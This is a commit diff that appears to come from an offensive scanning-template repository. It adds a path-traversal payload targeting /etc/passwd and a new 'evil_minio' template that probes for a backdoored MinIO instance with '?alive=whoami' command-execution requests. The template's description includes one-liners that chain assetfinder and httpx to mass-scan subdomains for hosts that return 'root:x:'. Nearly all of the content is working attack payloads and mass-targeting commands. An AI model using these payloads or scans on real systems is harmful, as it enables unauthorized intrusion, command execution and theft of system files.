up 2023-03-30

Author: hktalent

config/51pwn/pay001.yaml

@@ -24,6 +24,7 @@ requests:
         - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
         - "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
         - "................../etc/passwd"
+        - "//////////////////../../../../../../../../etc/passwd"
         - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
         - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
         - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"

config/51pwn/pay002.yaml

@@ -0,0 +1,32 @@
+id: evil_minio
+info:
+  name: evil_minio
+  severity: high
+  author:
+  - 51pwn
+  description: |-
+    https://github.com/AbelChe/evil_minio
+    cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/?alive=whoami" -mr "root:x:" -t 60
+    cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/anything?alive=whoami" -mr "root:x:" -t 60
+    evil_minio
+requests:
+  - raw:
+      - |
+        GET /{{path1}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        
+    payloads:
+      path1:
+        - "/?alive=whoami"
+        - "/anything?alive=whoami"
+    attack: clusterbomb
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+        - 'root:x:'
+        
+    redirects: false
+